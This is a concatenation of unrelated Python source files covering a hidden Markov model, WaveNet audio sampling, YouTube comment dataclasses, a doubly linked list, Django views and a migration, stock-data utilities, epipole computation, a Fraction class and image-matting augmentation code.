        A, B and pi are written as natural logarithms (see read(), which
        exponentiates them back).
        :param matrix_prefix: Example: "../hmm1_"
        :return:
        '''
        assert (len(matrix_prefix) > 0)

        assert (self.A.shape[0] == self.A.shape[1])
        with open(str(matrix_prefix) + 'logA.csv', 'w') as csvfile:
            writer = csv.writer(csvfile)
            [writer.writerow(np.log(r)) for r in self.A]

        with open(str(matrix_prefix) + 'logB.csv', 'w') as csvfile:
            writer = csv.writer(csvfile)
            [writer.writerow(np.log(r)) for r in self.B]

        assert (self.pi.shape[0] > 0)
        with open(str(matrix_prefix) + 'logpi.csv', 'w') as csvfile:
            writer = csv.writer(csvfile)
            writer.writerow(self.pi[0])

        with open(str(matrix_prefix) + 'vocabulary.csv', 'w') as csvfile:
            writer = csv.writer(csvfile)
            for k, v in self.vocabulary.items():
                writer.writerow([k, v])

    def read(self, A_path, B_path, pi_path, vocabulary_path):
        """Load hyperparameters previously written by save().

        The CSV files store log-probabilities, so they are exponentiated
        back into probabilities here.
        """
        A = np.e ** (pd.read_csv(A_path, header=None).to_numpy())
        B = np.e ** (pd.read_csv(B_path, header=None).to_numpy())
        pi = np.e ** (pd.read_csv(pi_path, header=None).to_numpy())

        v = pd.read_csv(vocabulary_path, header=None)
        vocabulary = dict()
        for idx in range(len(v)):
            key = v.at[idx, 0]
            value = v.at[idx, 1]
            vocabulary[key] = value

        # A and B is stored in log
        self.A = A
        self.B = B
        self.pi = pi
        self.vocabulary = vocabulary
        self.n_hidden_states = A.shape[0]
        return A, B, pi, vocabulary

    def convertSequences2Index(self, X, vocabulary, split_level='CHARACTER'):
        """Convert raw sequences *X* into integer index arrays via *vocabulary*.

        Tokens absent from the vocabulary keep the zero-initialized index 0,
        i.e. they are silently mapped to the symbol with index 0.
        """
        assert (len(vocabulary) > 0)
        X_transform = []
        for x in X:
            # split sequence into fragments
            tokens = []
            if split_level == 'CHARACTER':
                tokens = [character for character in x]
            elif split_level == 'WORD':
                tokens = x.split(' ')

            x_transform = np.zeros(shape=(len(tokens),))

            # convert X to symbol
            for idx, token in enumerate(tokens):
                # ignore if word does not exist in the vocabulary
                for key, value in vocabulary.items():
                    if key == token:
                        x_transform[idx] = value
                        break

            x_transform = x_transform.astype(dtype='int')
            X_transform.append(x_transform)
        return X_transform

    def compute_likelihood(self, X, split_level='CHARACTER'):
        """Return the forward-algorithm likelihood P(x | model) for each
        sequence in *X* (numpy version of compute_anpha)."""
        likelihood_arr = []
        X_transform = self.convertSequences2Index(X, self.vocabulary, split_level)
        for x, x_transform in zip(X, X_transform):
            #print(f"x = {x} / x_transform = {x_transform}")
            # compute anpha
            last_anpha = np.multiply(self.pi, self.B[:, x_transform[0]])  # 1xN
            for t in range(1, len(x_transform)):
                last_anpha = np.multiply(np.matmul(last_anpha, self.A), self.B[:, x_transform[t]])  # 1xN

            # likelihood = sum of the last anpha
            likelihood = np.sum(last_anpha)
            likelihood_arr.append(likelihood)
        return likelihood_arr

    def load_data(self, experiments, split_level='CHARACTER'):
        """Encode raw experiment strings into integer sequences, building
        the vocabulary (symbol -> index) on the fly.

        Returns:
            (sequences, vocabulary): list of int arrays plus the symbol map.
        """
        sequences = []
        vocabulary = dict()
        for idx, experiment in enumerate(experiments):
            # define how to split a sequence into fragments
            T = 0
            if split_level == 'CHARACTER':
                T = len(experiment)
            elif split_level == 'WORD':
                experiment = experiment.split(' ')
                T = len(experiment)

            sequence = np.zeros(shape=(T,))

            # iterate over the fragments
            for trial_idx in range(0, T):
                trial = experiment[trial_idx]
                if not trial in vocabulary:
                    vocabulary[trial] = len(vocabulary)
                sequence[trial_idx] = vocabulary[trial]

            sequence = sequence.astype(dtype='int')
            sequences.append(sequence)
        return sequences, vocabulary
if __name__ == '__main__':
    np.set_printoptions(suppress=True)

    # Step 1. train HMM
    # The value of hyperparameters (e.g., A, B, pi) will be stored in external files for further usages.
    hmm = HMMD_TF()  # we can choose a different number of hidden states
    # the size of vocabulary = 2 (i.e., T means tail, H means head)
    experiments = ["TTTTTTTTTTTTTTTTTTTTTTTTTTTHTTTT", "HHHHHHHHHHHHHHHTHHHHHHHHH"]
    sequences, vocabulary = hmm.load_data(experiments, split_level='CHARACTER')
    hmm.fit(sequences, vocabulary, n_hidden_states=2, weight_file_prefix='../hmm_', prefix='')
    hmm.draw()

    # Step 2. test HMM
    # You can load hyperparameter files without training anymore.
    print('Test. Read weights from file')
    hmm2 = HMMD_TF()  # no need to specify the number of hidden states
    hmm2.read(A_path='../hmm_logA.csv', B_path='../hmm_logB.csv', pi_path='../hmm_logpi.csv',
              vocabulary_path='../hmm_vocabulary.csv')
    # Score a few held-out sequences under the loaded model.
    Xtest = ["THTHTHTHTHTHTHTHTHTHTH",
             "TTTTTTTTTTTTTTTTTTTTTT",
             "HHHHHHHHHHHHHHHHHHHHHH",
             "TTTTTTTTTHTTTTTTTTTTTT",
             "TTTTTTTTTHTTTTTTHTTTTTT"]
    likelihood_arr = hmm2.compute_likelihood(Xtest, split_level='CHARACTER')
    for sequence, likelihood in zip(Xtest, likelihood_arr):
        print(f'Test {sequence} : probability = {likelihood} (log of probability = {np.log(likelihood)})')
|
from time import time
from utils import make_batch
from models import WaveNet, Generator
from IPython.display import Audio
import matplotlib.pyplot as plt
import librosa.display
import numpy as np

# Script: train a small WaveNet on one wav file and sample from the model.
# NOTE(review): depends on the local `utils`/`models` modules; the Audio()
# calls only display inside an IPython/Jupyter session.
inputs, targets = make_batch('./voice.wav')
output_path = './output.wav'

num_time_samples = inputs.shape[1]
num_channels = 1
gpu_fraction = 1

# sample_rate = 44100
sample_rate = 32000

# Sanity-check the source audio: load the first 5 seconds and print shape/rate.
y, sr = librosa.load('./voice.wav', duration=5.0)
print(y.shape)
print(sr)
# librosa.output.write_wav('./file_trim_5s.wav', y, sr)

model = WaveNet(num_time_samples=num_time_samples, num_channels=num_channels, gpu_fraction=gpu_fraction)

print('inputs.shape = ', inputs.shape)
Audio(inputs.reshape(inputs.shape[1]), rate=44100)
print('inputs.shape = ', inputs.shape)
print('targets.shape = ', targets.shape)

# Time the training run.
tic = time()
model.test(inputs, targets)
toc = time()
print('Training time = {} seconds'.format(toc-tic))

# Autoregressive sampling, seeded with the first input sample.
generator = Generator(model)
input_ = inputs[:, 0:1, 0]
tic = time()
predictions = generator.run(input_, sample_rate)
Audio(predictions, rate=44100)

# --- Commented-out export / plotting experiments kept for reference ---
# print('prediction.shape = ', predictions.shape)
# predictions_output = predictions[0, :]
# print('predictions_output.shape=', predictions_output.shape)
# toc = time()
# print('Sampling time = {} seconds'.format(toc-tic))
# print('Completed sampling rate = {}'.format(predictions.shape[1]))
# librosa.output.write_wav(output_path, predictions[0, :], sample_rate)
# wav_out = predictions_output.astype(dtype=np.float16)
# librosa.output.write_wav(output_path, wav_out, 22050)
# print('Output signal saved to {} successfully'.format(output_path))
# from scipy.io import wavfile
# # wav_out = np.asarray(predictions_output)
# wav_out = predictions.astype(dtype=np.int16)
# wavfile.write('./testout.wav', 44100, wav_out)
# librosa.display.waveplot(predictions[0, :], sr=sample_rate)
# plt.show()
# X = librosa.stft(predictions[0, :])
# Xdb = librosa.amplitude_to_db(abs(X))
# librosa.display.specshow(Xdb, sr=sample_rate, x_axis='time', y_axis='hz')
# plt.show()
|
"""
These are comment related models.
"""
from dataclasses import dataclass, field
from typing import List, Optional
from .base import BaseModel
from .mixins import DatetimeTimeMixin
from .common import BaseApiResponse, BaseResource
@dataclass
class CommentSnippetAuthorChannelId(BaseModel):
    """
    A class representing comment's snippet authorChannelId info.

    Refer: https://developers.google.com/youtube/v3/docs/comments#snippet.authorChannelId
    """

    # Channel id of the comment author (absent when not available).
    value: Optional[str] = field(default=None)
@dataclass
class CommentSnippet(BaseModel, DatetimeTimeMixin):
    """
    A class representing comment's snippet info.

    Refer: https://developers.google.com/youtube/v3/docs/comments#snippet
    """

    # Author identity and profile links.
    authorDisplayName: Optional[str] = field(default=None)
    authorProfileImageUrl: Optional[str] = field(default=None, repr=False)
    authorChannelUrl: Optional[str] = field(default=None, repr=False)
    authorChannelId: Optional[CommentSnippetAuthorChannelId] = field(
        default=None, repr=False
    )
    # Where the comment was posted.
    channelId: Optional[str] = field(default=None, repr=False)
    videoId: Optional[str] = field(default=None, repr=False)
    # Comment body (display and original form) and threading parent.
    textDisplay: Optional[str] = field(default=None, repr=False)
    textOriginal: Optional[str] = field(default=None, repr=False)
    parentId: Optional[str] = field(default=None, repr=False)
    # Viewer interaction state and counters.
    canRate: Optional[bool] = field(default=None, repr=False)
    viewerRating: Optional[str] = field(default=None, repr=False)
    likeCount: Optional[int] = field(default=None)
    moderationStatus: Optional[str] = field(default=None, repr=False)
    # Timestamp strings; DatetimeTimeMixin presumably provides datetime
    # accessors for them — confirm against .mixins.
    publishedAt: Optional[str] = field(default=None, repr=False)
    updatedAt: Optional[str] = field(default=None, repr=False)
@dataclass
class Comment(BaseResource):
    """
    A class representing comment info.

    Refer: https://developers.google.com/youtube/v3/docs/comments
    """

    # Core comment payload (see CommentSnippet above).
    snippet: Optional[CommentSnippet] = field(default=None)
@dataclass
class CommentListResponse(BaseApiResponse):
    """
    A class representing the comment's retrieve response info.

    Refer: https://developers.google.com/youtube/v3/docs/comments/list#response_1
    """

    # The page of Comment resources returned by comments.list.
    items: Optional[List[Comment]] = field(default=None, repr=False)
|
'''
双向链表
'''
# -*- coding:utf-8 -*-
class Node(object):
    """A doubly linked list node: *data* plus prev/next links."""

    def __init__(self, data, _prev=None, _next=None):
        self.data = data
        self._prev = _prev
        self._next = _next


class DoubleLinkedList(object):
    '''
    Doubly linked list.

    Methods:
        insert_new_value_to_head              insert a new node at the head
        insert_new_value_after_target_node    insert a new node after a given node
        insert_new_value_before_target_node   insert a new node before a given node
        delete_target_node                    delete a given node
        print_double_linked_list              print the list contents
        get_node_by_value                     return the first node with a given value
    '''

    def __init__(self, node=None):
        self._head = node

    def insert_new_value_to_head(self, value):
        """Insert *value* as a new node at the head of the list."""
        new_node = Node(value)
        if self._head is None:
            self._head = new_node
        else:
            new_node._next = self._head
            self._head._prev = new_node
            self._head = new_node

    def insert_new_value_after_target_node(self, target_node, value):
        """Insert *value* immediately after *target_node*."""
        new_node = Node(value, _prev=target_node, _next=target_node._next)
        # Fix: the original dereferenced target_node._next._prev
        # unconditionally, raising AttributeError when target was the tail.
        if target_node._next is not None:
            target_node._next._prev = new_node
        target_node._next = new_node

    def insert_new_value_before_target_node(self, target_node, value):
        """Insert *value* immediately before *target_node*."""
        new_node = Node(value, _prev=target_node._prev, _next=target_node)
        if target_node._prev is not None:
            target_node._prev._next = new_node
        else:
            # Fix: inserting before the head crashed in the original
            # (target_node._prev is None); update the head pointer instead.
            self._head = new_node
        target_node._prev = new_node

    def delete_target_node(self, target_node):
        """Unlink *target_node* from the list (head and tail included)."""
        # Fix: the original dereferenced both neighbours unconditionally and
        # so raised AttributeError when deleting the head or the tail.
        if target_node._prev is not None:
            target_node._prev._next = target_node._next
        else:
            self._head = target_node._next
        if target_node._next is not None:
            target_node._next._prev = target_node._prev

    def print_double_linked_list(self):
        """Print the list as head⇄...⇄tail (no trailing newline)."""
        current = self._head
        while current:
            if current is self._head:
                print(f"{current.data}", end="")
            else:
                print(f"⇄{current.data}", end="")
            current = current._next

    def get_node_by_value(self, value):
        """Return the first node whose data equals *value*, or None.

        Works because in a non-circular list the scan ends on None either
        way (the original had unreachable dead code after this return).
        """
        current = self._head
        while current and current.data != value:
            current = current._next
        return current
if __name__ == '__main__':
    # Demo: build a small list and exercise the insert/lookup methods.
    dl = DoubleLinkedList()
    dl.insert_new_value_to_head(1)
    dl.insert_new_value_to_head(2)
    # dl.print_double_linked_list()

    '''
    # test data2
    data2 = dl.get_node_by_value(2)
    print(data2._prev)
    print(data2.data)
    print(data2._next.data)
    '''
    '''
    # test data1
    data1 = dl.get_node_by_value(1)
    print(data1._prev.data)
    print(data1.data)
    print(data1._next)
    '''
    # Insert new nodes after the node holding 2
    data2 = dl.get_node_by_value(2)
    dl.insert_new_value_after_target_node(data2, 3)
    dl.insert_new_value_after_target_node(data2, 4)
    dl.print_double_linked_list()

    # Delete the node holding 4
    # NOTE(review): this actually looks up 6, which is not in the list, so
    # data4 is None and the (commented-out) delete would fail.
    data4 = dl.get_node_by_value(6)
    print(data4)
    # dl.delete_target_node(data4)
    exit()

    '''
    # 在数据1前插入新结点
    data1 = dl.get_node_by_value(1)
    dl.insert_new_value_before_target_node(data1, 3)
    dl.insert_new_value_before_target_node(data1, 4)
    '''
    dl.print_double_linked_list()
|
import os
import json
from notebook_rendering import Notebook
def test_notebook_render(tmpdir):
    """Execute hello.ipynb and check that the run adds cell output."""
    input_path = 'tests/files/hello.ipynb'
    output_path = os.path.join(tmpdir, 'notebook.ipynb')

    # The fixture notebook holds one unexecuted code cell.
    source_cell = {
        'cell_type': 'code',
        'execution_count': None,
        'metadata': {'collapsed': True},
        'outputs': [],
        'source': ["print('Hello, World!')"]
    }
    with open(input_path, 'r') as handle:
        assert json.load(handle)['cells'] == [source_cell]

    Notebook(input_path, 'python3').render(output_path)
    assert os.path.exists(output_path)

    # After rendering, the cell has been executed and captured stdout.
    executed_cell = {
        'cell_type': 'code',
        'execution_count': 1,
        'metadata': {'collapsed': True},
        'outputs': [
            {
                'name': 'stdout',
                'output_type': 'stream',
                'text': ['Hello, World!\n']
            }
        ],
        'source': ["print('Hello, World!')"]
    }
    with open(output_path, 'r') as handle:
        assert json.load(handle)['cells'] == [executed_cell]
def test_notebook_render_html(tmpdir):
    """Render hello.ipynb to HTML and check the document head."""
    input_path = 'tests/files/hello.ipynb'
    output_path = os.path.join(tmpdir, 'notebook.html')

    Notebook(input_path, 'python3').render(output_path, 'html')
    assert os.path.exists(output_path)

    with open(output_path, 'r') as handle:
        rendered = handle.read()
    expected_head = '''<!DOCTYPE html>
<html>
<head><meta charset="utf-8" />
<title>hello</title>'''
    assert rendered.startswith(expected_head)
|
"""Util functions for StrategyLearner."""
import datetime as dt
import os
import pandas as pd
import numpy as np
def symbol_to_path(symbol, base_dir=None):
    """Build the path to the CSV data file for *symbol*.

    When *base_dir* is not given, falls back to $MARKET_DATA_DIR
    (default '../data/').
    """
    root = base_dir if base_dir is not None else os.environ.get("MARKET_DATA_DIR", '../data/')
    return os.path.join(root, "{}.csv".format(str(symbol)))
def get_data(symbols, dates, addSPY=True, colname = 'Adj Close'):
    """Read stock data (adjusted close) for given symbols from CSV files."""
    df = pd.DataFrame(index=dates)
    # SPY anchors the calendar: prepend it when absent so non-trading days
    # can be dropped from the index.
    if addSPY and 'SPY' not in symbols:
        symbols = ['SPY'] + symbols

    for symbol in symbols:
        prices = pd.read_csv(
            symbol_to_path(symbol),
            index_col='Date',
            parse_dates=True,
            usecols=['Date', colname],
            na_values=['nan'],
        ).rename(columns={colname: symbol})
        df = df.join(prices)
        if symbol == 'SPY':
            # drop dates SPY did not trade
            df = df.dropna(subset=["SPY"])

    return df
def get_orders_data_file(basefilename):
    """Open an orders file from $ORDERS_DATA_DIR (default 'orders/')."""
    orders_dir = os.environ.get("ORDERS_DATA_DIR", 'orders/')
    return open(os.path.join(orders_dir, basefilename))
def get_learner_data_file(basefilename):
    """Open a learner data file (read mode) from $LEARNER_DATA_DIR (default 'Data/')."""
    learner_dir = os.environ.get("LEARNER_DATA_DIR", 'Data/')
    return open(os.path.join(learner_dir, basefilename), 'r')
def get_robot_world_file(basefilename):
    """Open a robot world file from $ROBOT_WORLDS_DIR (default 'testworlds/')."""
    worlds_dir = os.environ.get("ROBOT_WORLDS_DIR", 'testworlds/')
    return open(os.path.join(worlds_dir, basefilename))
def normalize_data(df):
    """Normalize stock prices so every series starts at 1.0 (divide each
    column by its value in the first row)."""
    first_row = df.iloc[0]
    return df.div(first_row)
def compute_daily_returns(df):
    """Compute day-over-day percentage returns; the first row (which has no
    previous day) is set to 0."""
    returns = df.pct_change()
    returns.iloc[0, :] = 0
    return returns
def compute_sharpe_ratio(k, avg_return, risk_free_rate, std_return):
    """
    Compute and return the Sharpe ratio

    Parameters:
    k: adjustment factor, sqrt(252) for daily data, sqrt(52) for weekly data, sqrt(12) for monthly data
    avg_return: daily, weekly or monthly return
    risk_free_rate: daily, weekly or monthly risk free rate
    std_return: daily, weekly or monthly standard deviation

    Returns:
    sharpe_ratio: k * (avg_return - risk_free_rate) / std_return
    """
    excess_return = avg_return - risk_free_rate
    return k * excess_return / std_return
def plot_data(df, title="Stock prices", xlabel="Date", ylabel="Price", save_fig=False, fig_name="plot.png"):
    """Plot stock prices with a custom title and meaningful axis labels.

    Parameters:
        df: DataFrame of prices to plot (one line per column)
        title, xlabel, ylabel: chart labels
        save_fig: when True, save the figure to *fig_name* instead of showing it
        fig_name: output file used when save_fig is True
    """
    # Fix: the original referenced `plt` without ever importing matplotlib,
    # so both branches below raised NameError. Imported locally because the
    # rest of this module never needs matplotlib.
    import matplotlib.pyplot as plt

    ax = df.plot(title=title, fontsize=12)
    ax.set_xlabel(xlabel)
    ax.set_ylabel(ylabel)
    if save_fig:
        plt.savefig(fig_name)
    else:
        plt.show()
def load_txt_data(dirpath, filename):
    """ Load the data from a txt file and store them as a numpy array

    Parameters:
        dirpath: The path to the directory where the file is stored
        filename: The name of the file in the dirpath

    Returns:
        np_data: A numpy array (dtype=str) of the data

    Raises:
        OSError: if the file does not exist or cannot be read.
    """
    # Fix: the original wrapped os.path.join in try/except KeyError, which
    # can never fire here, and on any failure would have left `filepath`
    # undefined (NameError) while only printing a message. np.loadtxt
    # already raises a clear OSError for a missing file.
    filepath = os.path.join(dirpath, filename)
    return np.loadtxt(filepath, dtype=str)
def get_exchange_days(start_date = dt.datetime(1964,7,5), end_date = dt.datetime(2020,12,31),
                      dirpath = "../data/dates_lists", filename="NYSE_dates.txt"):
    """ Create a list of dates between start_date and end_date (inclusive) that correspond
    to the dates there was trading at an exchange. Default values are given based on NYSE.

    Parameters:
        start_date: First timestamp to consider (inclusive)
        end_date: Last day to consider (inclusive)
        dirpath: The path to the directory where the file is stored
        filename: The name of the file in the dirpath

    Returns:
        dates: A list of dates between start_date and end_date on which an exchange traded
    """
    # Load the raw date strings and parse them as mm/dd/yyyy.
    raw_dates = load_txt_data(dirpath, filename)
    parsed_dates = [dt.datetime.strptime(token, "%m/%d/%Y") for token in raw_dates]
    # A date-indexed Series makes the inclusive start:end slice trivial.
    calendar = pd.Series(index=parsed_dates, data=parsed_dates)
    return list(calendar[start_date:end_date])
def get_data_as_dict(dates, symbols, keys):
    """ Create a dictionary with types of data (Adj Close, Volume, etc.) as keys. Each value is
    a dataframe with symbols as columns and dates as rows

    Parameters:
        dates: A list of dates of interest
        symbols: A list of symbols of interest
        keys: A list of types of data of interest, e.g. Adj Close, Volume, etc.

    Returns:
        data_dict: A dictionary whose keys are types of data, e.g. Adj Close, Volume, etc. and
        values are dataframes with dates as indices and symbols as columns
    """
    data_dict = {}
    for key in keys:
        frame = pd.DataFrame(index=dates)
        for symbol in symbols:
            column = pd.read_csv(
                symbol_to_path(symbol),
                index_col="Date",
                parse_dates=True,
                usecols=["Date", key],
                na_values=["nan"],
            ).rename(columns={key: symbol})
            frame = frame.join(column)
        data_dict[key] = frame
    return data_dict
def create_df_benchmark(symbol, start_date, end_date, num_shares):
    """Create a dataframe of benchmark trades: buy num_shares of *symbol*
    on the first available trading day and sell them on the last."""
    # Get adjusted close price data
    prices = get_data([symbol], pd.date_range(start_date, end_date),
                      addSPY=False).dropna()
    # Buy-and-hold: one buy at the earliest date, one sell at the latest.
    first_day = prices.index.min()
    last_day = prices.index.max()
    benchmark = pd.DataFrame(
        data=[(first_day, num_shares), (last_day, -num_shares)],
        columns=["Date", "Shares"])
    return benchmark.set_index("Date")
def create_df_trades(orders, symbol, num_shares, cash_pos=0, long_pos=1, short_pos=-1):
    """Create a dataframe of trades based on the orders executed. +1000
    indicates a BUY of 1000 shares, and -1000 indicates a SELL of 1000 shares.
    Positions other than long/short/cash are skipped.
    """
    # Remove cash positions to make the loop below run faster
    active = orders[orders != cash_pos]
    records = [
        (date, num_shares if active.loc[date] == long_pos else -num_shares)
        for date in active.index
        if active.loc[date] in (long_pos, short_pos)
    ]
    df_trades = pd.DataFrame(records, columns=["Date", "Shares"])
    return df_trades.set_index("Date")
|
from django.shortcuts import render
def main(request):
    """Render the landing page."""
    context = {'like': 'Django很棒'}
    return render(request, 'main/main.html', context)
def about(request):
    """Render the about page; range10 lets the template iterate 0-9."""
    return render(request, 'main/about.html', {'range10': range(10)})
|
# Generated by Django 2.2.1 on 2019-05-19 20:08
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds the optional `event_description` text field to the Event model."""

    dependencies = [
        ('events', '0005_auto_20190519_1542'),
    ]

    operations = [
        migrations.AddField(
            model_name='event',
            name='event_description',
            field=models.TextField(blank=True, help_text='Brief description of event.'),
        ),
    ]
|
import numpy as np
def nullspace(A, atol=1e-13, rtol=0):
    """Return the null-space vector(s) of A via SVD, normalized so the
    third component equals 1 (homogeneous-coordinate scaling).

    Parameters
    ----------
    A : array_like, matrix whose null space is wanted.
    atol : float, absolute tolerance below which a singular value is zero.
    rtol : float, tolerance relative to the largest singular value.

    Returns a column array (right singular vectors for near-zero singular
    values), divided by its third row.
    """
    u, d, v = np.linalg.svd(A)
    # BUG FIX: the atol/rtol parameters were previously ignored — the rank
    # test hard-coded 1e-13.  Combine them in the standard way instead.
    tol = max(atol, rtol * d[0])
    rank = (d > tol).sum()
    e = v[rank:].conj().T
    # Scale so the last (homogeneous) coordinate is 1
    return e / e[2]
def findEpipole(A):
    """The epipole is the null-space vector of the transposed matrix."""
    transposed = A.T
    return nullspace(transposed)
if __name__ == "__main__":
    # Hard-coded fundamental matrix from a stereo pair; the epipole is the
    # right null vector of F^T, printed in homogeneous coordinates with the
    # last component scaled to 1.
    F = np.array([[-1.29750186e-06, 8.07894025e-07, 1.84071967e-03],
                  [3.54098411e-06, 1.05620725e-06, -8.90168709e-03],
                  [-3.29878312e-03, 5.14822628e-03, 1.00000000e+00]])
    print(findEpipole(F))
|
class Fraction:
    """A simple rational number with a numerator and a denominator.

    Arithmetic operators build new (unreduced) fractions; printing shows
    the "num/den" form via __str__, while __repr__ is a debug variant.
    """

    def __init__(self, N, D):
        self.num = N  # numerator
        self.den = D  # denominator

    def __str__(self):
        # Used by print(value)
        return f"{self.num}/{self.den}"

    def __repr__(self):
        # Used when a value is echoed without print()
        return f"{self.num} repr"

    def __mul__(self, autre):
        return Fraction(self.num * autre.num, self.den * autre.den)

    def __add__(self, autre):
        # Bring both terms over the common denominator den1*den2
        common = self.den * autre.den
        return Fraction(self.num * autre.den + autre.num * self.den, common)

    def __sub__(self, autre):
        common = self.den * autre.den
        return Fraction(self.num * autre.den - autre.num * self.den, common)

    def __truediv__(self, autre):
        # Division is multiplication by the reciprocal
        return Fraction(self.num * autre.den, self.den * autre.num)

    def coucou(self):
        """Demo method: greeting that includes the numerator."""
        return "coucou " + str(self.num)

    def coucou2(self):
        """Second demo method: greeting that includes the numerator."""
        return "coucou2 " + str(self.num)
# Quick manual demo of the Fraction class.
f1 = Fraction(3, 4)
print(type(f1))
print(dir(f1))
print(f1.num)
print(f1)  # uses __str__
print(f1.coucou())
f2 = Fraction(1, 4)
# Results of the operators are not reduced to lowest terms
print(f1 * f2)
print(f1 + f2)
print(f1 - f2)
print(f1 / f2)
|
import feature_extraction
from sklearn.feature_extraction import FeatureHasher
import common
import sys
import numpy as np
if __name__ == '__main__':
    # Build the UCF dataset from extracted video frames.
    # NOTE(review): generate_ucf_dataset lives in the project-local `common`
    # module — presumably returns (features, labels); confirm against common.py.
    X,y = common.generate_ucf_dataset('frames')
|
from os import listdir
import cv2 as cv
import numpy as np
from os import path, makedirs
import math
import matplotlib.pyplot as plt
import argparse
import tqdm
import tensorflow as tf
import time
import threading
from guided_filter import guided_filter_cv as guided_filter
class bbox:
    """Axis-aligned box with inclusive corners lt (top-left) and rb
    (bottom-right), stored as [row, col] lists."""

    def __init__(self, lt, rb):
        # Copy the corners into fresh lists so boxes never alias the
        # caller's (or another box's) corner storage.
        self.lt = [lt[0], lt[1]]
        self.rb = [rb[0], rb[1]]

    def is_val(self, img_shape):
        """Return True when the box lies entirely inside an image of img_shape."""
        l_val = self.lt[0] >= 0
        t_val = self.lt[1] >= 0
        r_val = self.rb[0] < img_shape[0]
        b_val = self.rb[1] < img_shape[1]
        return l_val and t_val and r_val and b_val

    def get_crop(self, img):
        """Return the crop of img covered by this box, or None when the box
        does not fit inside the image."""
        if self.is_val(img.shape):
            return img[self.lt[0]:self.rb[0] + 1, self.lt[1]:self.rb[1] + 1]
        return None

    def random_shift(self, img_shape, max_shift):
        """Translate the box in place by a random amount (< max_shift) per
        axis, with a randomly chosen direction, staying inside img_shape."""
        # choose left/right and top/bottom
        shift_choose = np.random.randint(2, size=(2))
        # BUG FIX: the original compared with `is 0`; numpy integers are
        # never identical to the Python int 0, so the left/top branches
        # were dead code and the box only ever shifted right/down.
        #### Left / Right ####
        if shift_choose[0] == 0:  # shift left
            tmp_max = min(max_shift, self.lt[0])
            if tmp_max > 0:
                tmp_shift = np.random.randint(tmp_max)
                self.lt[0] = self.lt[0] - tmp_shift
                self.rb[0] = self.rb[0] - tmp_shift
        else:  # shift right
            tmp_max = min(max_shift, img_shape[0] - self.rb[0] - 1)
            if tmp_max > 0:
                tmp_shift = np.random.randint(tmp_max)
                self.lt[0] = self.lt[0] + tmp_shift
                self.rb[0] = self.rb[0] + tmp_shift
        #### Top / Bottom ####
        if shift_choose[1] == 0:  # shift top
            tmp_max = min(max_shift, self.lt[1])
            if tmp_max > 0:
                tmp_shift = np.random.randint(tmp_max)
                self.lt[1] = self.lt[1] - tmp_shift
                self.rb[1] = self.rb[1] - tmp_shift
        else:  # shift bottom
            tmp_max = min(max_shift, img_shape[1] - self.rb[1] - 1)
            if tmp_max > 0:
                tmp_shift = np.random.randint(tmp_max)
                self.lt[1] = self.lt[1] + tmp_shift
                self.rb[1] = self.rb[1] + tmp_shift

    def shift(self, shift_size):
        """Return a NEW bbox translated by (row, col) offsets in shift_size."""
        shifted = bbox(self.lt, self.rb)
        shifted.lt[0] = shifted.lt[0] + shift_size[0]
        shifted.lt[1] = shifted.lt[1] + shift_size[1]
        shifted.rb[0] = shifted.rb[0] + shift_size[0]
        shifted.rb[1] = shifted.rb[1] + shift_size[1]
        return shifted

    def __repr__(self):
        return f"LT: {self.lt}, RB: {self.rb}"
def rotate_Fg_Alpha(fg, alpha, angle):
    """Rotate a grayscale foreground and its alpha matte by `angle` degrees,
    then centre-crop both to the largest axis-aligned rectangle that excludes
    the black borders introduced by the rotation.

    Both inputs are treated as 2-D arrays (fg.shape[::-1] is used as the
    (width, height) destination size for warpAffine).  Returns the cropped
    (fg, alpha) pair.
    """
    def rotatedRectWithMaxArea(w, h, angle):
        """
        https://stackoverflow.com/questions/16702966/rotate-image-and-crop-out-black-borders
        Given a rectangle of size wxh that has been rotated by 'angle' (in
        radians), computes the width and height of the largest possible
        axis-aligned rectangle (maximal area) within the rotated rectangle.
        """
        if w <= 0 or h <= 0:
            return 0, 0
        width_is_longer = w >= h
        side_long, side_short = (w, h) if width_is_longer else (h, w)
        # since the solutions for angle, -angle and 180-angle are all the same,
        # if suffices to look at the first quadrant and the absolute values of sin,cos:
        sin_a, cos_a = abs(math.sin(angle)), abs(math.cos(angle))
        if side_short <= 2.*sin_a*cos_a*side_long or abs(sin_a-cos_a) < 1e-10:
            # half constrained case: two crop corners touch the longer side,
            # the other two corners are on the mid-line parallel to the longer line
            x = 0.5*side_short
            wr, hr = (x/sin_a, x/cos_a) if width_is_longer else (x/cos_a, x/sin_a)
        else:
            # fully constrained case: crop touches all 4 sides
            cos_2a = cos_a*cos_a - sin_a*sin_a
            wr, hr = (w*cos_a - h*sin_a)/cos_2a, (h*cos_a - w*sin_a)/cos_2a
        return wr, hr
    # Rotate about the image centre; OpenCV takes the angle in degrees
    center = (fg.shape[1]//2, fg.shape[0]//2)
    M = cv.getRotationMatrix2D(center, angle, 1.0)
    # Largest border-free crop is computed in radians
    wr, hr = rotatedRectWithMaxArea(fg.shape[1], fg.shape[0], np.deg2rad(angle))
    cropped_bbox = (int(wr), int(hr))
    rotated_fg = cv.warpAffine(fg, M, fg.shape[::-1])
    rotated_alpha = cv.warpAffine(alpha, M, alpha.shape[::-1])
    # Centre-crop both rotated images with the same box so they stay aligned
    cropped_fg = rotated_fg[center[1]-cropped_bbox[1]//2:center[1]+cropped_bbox[1] //
                            2, center[0]-cropped_bbox[0]//2:center[0]+cropped_bbox[0]//2]
    cropped_alpha = rotated_alpha[center[1] - cropped_bbox[1] // 2: center[1] +
                                  cropped_bbox[1] // 2, center[0] -
                                  cropped_bbox[0] // 2: center[0] +
                                  cropped_bbox[0] // 2]
    return cropped_fg, cropped_alpha
def compose(fg, bg, alpha):
    """Composite a grayscale foreground over a background with matte `alpha`
    (float array in [0, 1]), producing two blurred variants.

    Returns (result1, result2, alpha_blur):
      result1 — sharp foreground over a repeatedly blurred background,
      result2 — blurred foreground (and blurred matte) over the sharp
                background,
      alpha_blur — the matte after the foreground's blur passes.
    Results are uint8; alpha_blur stays float.
    """
    MAX_BLUR_TIMES = 5
    # BUG FIX: np.float was removed in NumPy 1.24 — use the builtin float
    # (same float64 dtype).
    fg = fg.astype(float)
    bg = bg.astype(float)
    # Draw fg first, then bg, to keep the original RNG consumption order
    fg_blur_times = np.random.randint(1, MAX_BLUR_TIMES+1)
    bg_blur_times = np.random.randint(1, MAX_BLUR_TIMES+1)
    kernel_sizes = [7, 11, 15]  # renamed: `filter` shadowed the builtin
    # Random kernel choice is currently disabled; both passes use the smallest
    # fg_kernel = kernel_sizes[np.random.randint(0, 3)]
